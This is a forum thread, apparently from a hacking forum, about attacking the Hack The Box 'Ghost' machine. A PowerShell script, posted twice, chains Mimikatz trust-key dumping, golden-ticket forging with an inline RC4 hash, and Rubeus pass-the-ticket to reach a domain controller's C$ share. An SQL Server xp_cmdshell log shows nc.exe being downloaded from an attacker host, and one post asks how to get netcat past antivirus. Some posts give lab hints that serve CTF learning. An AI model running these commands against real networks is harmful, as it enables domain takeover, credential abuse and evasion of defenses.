[wh1t3_r4bb1t]

How to bypass AV for nc.exe? AV every time removes my nc.exe from any folder in system, from Documents, Downloads etc.. Was trying different binaries, also 0 result
UPD. nvm, this one works fine https://dl.packetstormsecurity.net/group...sum/nc.exe

[Axura]

Hmmm.. just got out of prison by banning for LEECHING (?). Promise Mod to contribute after getting out of this jail.

If anyone still struggling for making the TGS work, start a new session or use `klist purge`, have mimikatz & rubeus ready (change the paths if needed), then run the following script, you can then access the remote resources on DC:

# Define the paths to the Mimikatz and Rubeus executables
$mimikatzPath = ".\mimikatz.exe"
$rubeusPath = ".\Rubeus.exe"

# Define the Mimikatz and Rubeus commands
$mimikatzTrustCmd = '"lsadump::trust /patch" exit'
$mimikatzGoldenCmd = '"kerberos::golden /user:Administrator /domain:CORP.GHOST.HTB /sid:S-1-5-21-2034262909-2733679486-179904498 /sids:S-1-5-21-4084500788-938703357-3654145966-519 /rc4:dae1ad83e2af14a379017f244a2f5297 /service:krbtgt /target:GHOST.HTB /ticket:axura.kirbi" exit'
$rubeusCmd = "/ticket:axura.kirbi /dc:dc01.ghost.htb /service:CIFS/dc01.ghost.htb /nowrap /ptt"

# Define the directory to check
$targetDirectory = "\\dc01.ghost.htb\c$"

# Function to run a command and wait for it to complete
function Run-Command {
    param (
        [string]$cmd
    )
    & cmd /c $cmd | Out-Null
}

# Loop to keep trying until access is granted
while ($true) {
    try {
        # Run Mimikatz to dump trust information and create the Golden Ticket
        Run-Command "$mimikatzPath $mimikatzTrustCmd"
        Run-Command "$mimikatzPath $mimikatzGoldenCmd"
       
        # Run Rubeus to request the TGS and apply the ticket
        Run-Command "$rubeusPath asktgs $rubeusCmd"

        # Check if we can access the directory
        $access = Test-Path $targetDirectory

        if ($access) {
            Write-Host "Access granted to $targetDirectory"
            dir $targetDirectory
            break
        } else {
            Write-Host "Access denied. Purging tickets and retrying..."
            klist purge
        }
    } catch {
        Write-Host "An error occurred: $_"
        klist purge
    }
}

P.S. If anyone knows any contactable HTB employers for banning issues, please PM me... Thank you (not leeching).

[cutearmadillo]

Two things:

Anyone knows steps for intended?

I know this is not for the box but, anybody knows why i get nginx forbidden when i try to answer for private messege?

Yes, there's a hint in the intranet within the conversation between kathryn.holland and justin.bradley. The user florence has some additional privileges to change the infrastructure
Then the next steps are pretty much obvious from the Bloodhound graph. Eventually you'll get back to the mssql part.

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching.

[standby123]

Any one has any idea on the ADFS ?
It accept the response with different message signature but the problem when trying to resign the assertion it returns 500

[cutearmadillo]

Any one has any idea on the ADFS ?
It accept the response with different message signature but the problem when trying to resign the assertion it returns 500

You gotta use the gmsa to sign your message and then it will be accepted by ADFS

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching.

[lostoceanghost]

SQL >[primary] (sa  dbo@master)> xp_cmdshell "echo IWR http://10.10.x.x/nc.exe -OutFile %TEMP%\nc.exe | powershell -noprofile"
output                                                                           
-------------------------------------------------------------------------------- 
Windows PowerShell                                                               

Copyright (C) Microsoft Corporation. All rights reserved.                         

NULL                                                                             

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows 

NULL                                                                             

PS C:\Windows\system32> IWR http://10.10.x.x/nc.exe -OutFile C:\Windows\SERVIC~1\MSSQLS~1\AppData\Local\Temp\nc.exe   

IWR : The operation has timed out.                                               

At line:1 char:1                                                                 

+ IWR http://10.10.x.x/nc.exe -OutFile C:\Windows\SERVIC~1\MSSQLS~1\A ...       

+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~           

    + CategoryInfo          : InvalidOperation: (System.Net.HttpWebRequest:HttpWebRequest) [Invoke-WebRequest], WebExc   

  eption                                                                         

    + FullyQualifiedErrorId : WebCmdletWebResponseException,Microsoft.PowerShell.Commands.InvokeWebRequestCommand

SQL >[primary] (sa  dbo@master)> xp_cmdshell copy \\10.10.x.x\share\nc.exe %TEMP%\nc.exe
output                                 
------------------------------------- 
An unexpected network error occurred. 

        0 file(s) copied.             

NULL

Yesterday I was able to upload the same file. Now it just freezes for a couple of minutes before throwing an error. Although I receive a connection, I can't upload even an empty text file. I also haven't been able to access federation.ghost.htb since then. In the first days of release AD FS worked just fine. At that time I could access the login form at least. Now it takes forever to load.

Anyone experiencing the same problems? Any suggestions? Restarted the box several times.

[standby123]

Any one has any idea on the ADFS ?
It accept the response with different message signature but the problem when trying to resign the assertion it returns 500

You gotta use the gmsa to sign your message and then it will be accepted by ADFS

I am in GHOST-CORP do I need to access dc?

[cutearmadillo]

Any one has any idea on the ADFS ?
It accept the response with different message signature but the problem when trying to resign the assertion it returns 500

You gotta use the gmsa to sign your message and then it will be accepted by ADFS

I am in GHOST-CORP do I need to access dc?

If you are in GHOST-CORP already then you do not need ADFS anymore.

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching.

[osamy7593]

guys is the mist machine OSEP prep or more advanced?

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Asking for rep is not allowed

[mazafaka555]

Hmmm.. just got out of prison by banning for LEECHING (?). Promise Mod to contribute after getting out of this jail.

If anyone still struggling for making the TGS work, start a new session or use `klist purge`, have mimikatz & rubeus ready (change the paths if needed), then run the following script, you can then access the remote resources on DC:

# Define the paths to the Mimikatz and Rubeus executables
$mimikatzPath = ".\mimikatz.exe"
$rubeusPath = ".\Rubeus.exe"

# Define the Mimikatz and Rubeus commands
$mimikatzTrustCmd = '"lsadump::trust /patch" exit'
$mimikatzGoldenCmd = '"kerberos::golden /user:Administrator /domain:CORP.GHOST.HTB /sid:S-1-5-21-2034262909-2733679486-179904498 /sids:S-1-5-21-4084500788-938703357-3654145966-519 /rc4:dae1ad83e2af14a379017f244a2f5297 /service:krbtgt /target:GHOST.HTB /ticket:axura.kirbi" exit'
$rubeusCmd = "/ticket:axura.kirbi /dc:dc01.ghost.htb /service:CIFS/dc01.ghost.htb /nowrap /ptt"

# Define the directory to check
$targetDirectory = "\\dc01.ghost.htb\c$"

# Function to run a command and wait for it to complete
function Run-Command {
    param (
        [string]$cmd
    )
    & cmd /c $cmd | Out-Null
}

# Loop to keep trying until access is granted
while ($true) {
    try {
        # Run Mimikatz to dump trust information and create the Golden Ticket
        Run-Command "$mimikatzPath $mimikatzTrustCmd"
        Run-Command "$mimikatzPath $mimikatzGoldenCmd"
       
        # Run Rubeus to request the TGS and apply the ticket
        Run-Command "$rubeusPath asktgs $rubeusCmd"

        # Check if we can access the directory
        $access = Test-Path $targetDirectory

        if ($access) {
            Write-Host "Access granted to $targetDirectory"
            dir $targetDirectory
            break
        } else {
            Write-Host "Access denied. Purging tickets and retrying..."
            klist purge
        }
    } catch {
        Write-Host "An error occurred: $_"
        klist purge
    }
}

P.S. If anyone knows any contactable HTB employers for banning issues, please PM me... Thank you (not leeching).

This's auto-ban don worry. They don't give a shit about your contribution/activity and never will... they want you to buy VIP acc or VIP+. That's all.

They have a script which is checking every day for "Free" users & if they have 31+ messages -- you'll get auto-ban for "Leeching".

---

guys is the mist machine OSEP prep or more advanced?

more advanced. it's a "Red Teaming" machine.